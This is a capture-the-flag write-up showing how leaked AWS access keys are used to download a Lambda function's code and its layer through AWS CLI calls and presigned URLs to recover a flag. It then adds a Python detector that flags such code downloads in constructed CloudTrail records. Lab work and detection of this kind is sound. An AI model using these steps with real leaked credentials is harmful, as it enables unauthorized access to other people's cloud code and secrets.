SecurityLabs challenge: Week 7 (Insecure Lambdas)
Another Tuesday, another challenge!
"We are back with another challenge of the week. Our Security team discovered some access keys belonging to a lambda function called myFunction in us-east-2 region. Help them and get the flag."
Set up the credentials and get a session token
aws sts get-session-token --duration 1800
(optional) Verify user
aws sts get-caller-identity
{
  "UserId": "AID...",
  "Account": "redacted",
  "Arn": "arn:aws:iam::redacted:user/challenge-7"
}
Let's see if we can download the function package and inspect the code:
aws lambda --region us-east-2 get-function --function-name myFunction
{
  "Configuration": {
    "FunctionName": "myFunction",
    "FunctionArn": "arn:aws:lambda:us-east-2:redacted:function:myFunction",
    "Runtime": "python3.8",
    "Role": "arn:aws:iam::redacted:role/service-role/myFunction-role-pg5cgb2a",
    "Handler": "lambda_function.lambda_handler",
    "CodeSize": 255,
    "Description": "",
    "Timeout": 3,
    "MemorySize": 128,
    "LastModified": "2022-03-22T15:07:47.000+0000",
    "CodeSha256": "nope",
    "Version": "$LATEST",
    "TracingConfig": {
      "Mode": "PassThrough"
    },
    "RevisionId": "redacted",
    "Layers": [
      {
        "Arn": "arn:aws:lambda:us-east-2:redacted:layer:challenge-7:1",
        "CodeSize": 378
      }
    ],
    "State": "Active",
    "LastUpdateStatus": "Successful",
    "PackageType": "Zip",
    "Architectures": [
      "x86_64"
    ]
  },
  "Code": {
    "RepositoryType": "S3",
    "Location": "https://awslambda-us-east-2-tasks.s3.us-east-2.amazonaws.com/snapshots/redacted/myFunction-2b2eb97e-2758-49b2-9981-932d4f2bd567?versionId=SBmsIao3tPl41Kk_IkcHjzkvJYb7KW&X-Amz-Security-Token=(redacted)"
  }
}
wget this package using the presigned "Location" URL in the output, then unzip it and look at the code:
from seclabs import get_flag

def lambda_handler(event, context):
    return {
        'statusCode': 200,
        'body': 'Hello from Lambda!'
    }
Looks pretty unassuming...except that import. Let's try invoking the lambda and see what happens:
aws lambda --region us-east-2 invoke --function-name myFunction response.json
An error occurred (AccessDeniedException) when calling the Invoke operation: User: arn:aws:iam::584358494719:user/challenge-7 is not authorized to perform: lambda:InvokeFunction on resource: arn:aws:lambda:us-east-2:redacted:function:myFunction because no identity-based policy allows the lambda:InvokeFunction action
Well, poop. Let's go back to our "get-function" output. We see this lambda uses a layer (99.9% sure it's what provides that import):
arn:aws:lambda:us-east-2:redacted:layer:challenge-7:1
So, if you don't know, Lambda Layers are additional zip files of code or other content that your lambda may access. They reduce the deployment size of your function and can make maintenance easier by keeping functions separate from boilerplate code. Let's see if we can download that layer:
aws lambda --region us-east-2 get-layer-version --layer-name challenge-7 --version-number 1
{
  "Content": {
    "Location": "https://awslambda-us-east-2-layers.s3.us-east-2.amazonaws.com/snapshots/redacted/challenge-7-1652086d-a340-4c0f-be18-125805a77101?versionId=SY3K0bK_kUT0MB9a.g7iHwoUsEVUG7&X-Amz-Security-Token=redacted",
    "CodeSize": 378
  },
  "LayerArn": "arn:aws:lambda:us-east-2:redacted:layer:challenge-7",
  "LayerVersionArn": "arn:aws:lambda:us-east-2:redacted:layer:challenge-7:1",
  "Description": "",
  "CreatedDate": "2022-03-22T15:06:44.178+0000",
  "Version": 1,
  "CompatibleRuntimes": [
    "python3.7",
    "python3.9",
    "python3.8"
  ],
  "CompatibleArchitectures": [
    "x86_64"
  ]
}
And once again wget that sucker down, unzip it, and inspect the code:
flag = "flag(flag)\n You can find more interesting challenges and learning materials at SecurityLabs. Register for beta at https://www.securitylabs.tech in case you haven't\n Have fun hacking cloud with SecurityLabs"
Oh, I am having fun, don't you worry!
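The takeaway for defenders is that a static access key with nothing more than lambda:GetFunction and lambda:GetLayerVersion was enough to pull the function package and the layer, even though it could not invoke the function. The script below is an added example, not part of the original writeup: it runs a simple detection over constructed CloudTrail-style records and groups Lambda code and layer downloads by long-lived IAM user key, treating assumed-role principals as expected. The eventName suffixes, the access key IDs and the source IPs are all assumptions made up for the sample.

```python
import re

# Constructed CloudTrail-style records for illustration, not real log data.
# The eventName suffixes (e.g. "20150502v2") mimic CloudTrail's versioned
# Lambda action names; the exact suffixes are an assumption, so matching is
# done on the action prefix rather than on the literal string.
SAMPLE_EVENTS = [
    {"eventName": "GetFunction20150502v2", "eventSource": "lambda.amazonaws.com",
     "userIdentity": {"type": "IAMUser", "userName": "challenge-7", "accessKeyId": "AKIA_CONSTRUCTED_1"},
     "requestParameters": {"functionName": "myFunction"}, "sourceIPAddress": "203.0.113.10"},
    {"eventName": "Invoke20150331", "eventSource": "lambda.amazonaws.com", "errorCode": "AccessDenied",
     "userIdentity": {"type": "IAMUser", "userName": "challenge-7", "accessKeyId": "AKIA_CONSTRUCTED_1"},
     "requestParameters": {"functionName": "myFunction"}, "sourceIPAddress": "203.0.113.10"},
    {"eventName": "GetLayerVersion20181031", "eventSource": "lambda.amazonaws.com",
     "userIdentity": {"type": "IAMUser", "userName": "challenge-7", "accessKeyId": "AKIA_CONSTRUCTED_1"},
     "requestParameters": {"layerName": "challenge-7", "versionNumber": 1}, "sourceIPAddress": "203.0.113.10"},
    {"eventName": "GetFunction20150502v2", "eventSource": "lambda.amazonaws.com",
     "userIdentity": {"type": "AssumedRole", "arn": "arn:aws:sts::123456789012:assumed-role/deploy/ci"},
     "requestParameters": {"functionName": "myFunction"}, "sourceIPAddress": "10.0.5.4"},
]

# Actions that hand out a presigned URL for function code or layer content.
CODE_READ_ACTIONS = ("GetFunction", "GetLayerVersion")


def action_of(event):
    """Strip CloudTrail's date/version suffix: 'GetFunction20150502v2' -> 'GetFunction'."""
    return re.sub(r"\d{8}(v\d+)?$", "", event["eventName"])


def code_access_alerts(events):
    """Return {accessKeyId: {...}} for IAM user keys that downloaded code or layers.

    Assumed roles (pipelines, SSO operators) are treated as expected; a static
    key pulling packages, especially alongside denied Invoke calls, is the
    reconnaissance pattern this challenge walks through.
    """
    by_key = {}
    for ev in events:
        ident = ev.get("userIdentity", {})
        if ev.get("eventSource") != "lambda.amazonaws.com" or ident.get("type") != "IAMUser":
            continue
        action = action_of(ev)
        entry = by_key.setdefault(ident.get("accessKeyId"),
                                  {"user": ident.get("userName"), "code_reads": [], "denied": []})
        params = ev.get("requestParameters", {})
        target = params.get("functionName") or params.get("layerName")
        if action in CODE_READ_ACTIONS:
            entry["code_reads"].append((action, target))
        if ev.get("errorCode"):
            entry["denied"].append((action, target))
    return {key: entry for key, entry in by_key.items() if entry["code_reads"]}
```

In a real deployment the same grouping would be applied to CloudTrail records from S3 or CloudWatch Logs, and a hit is the cue to rotate the key and check whether the downloaded package embedded any secrets.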
*On a sad note, these challenges are being paused for an indefinite amount of time. My assumption is a problem with AWS not liking insecure public resources, or access keys shared. Scott Piper/flAWS just had this same issue, and almost had his whole account stuffed...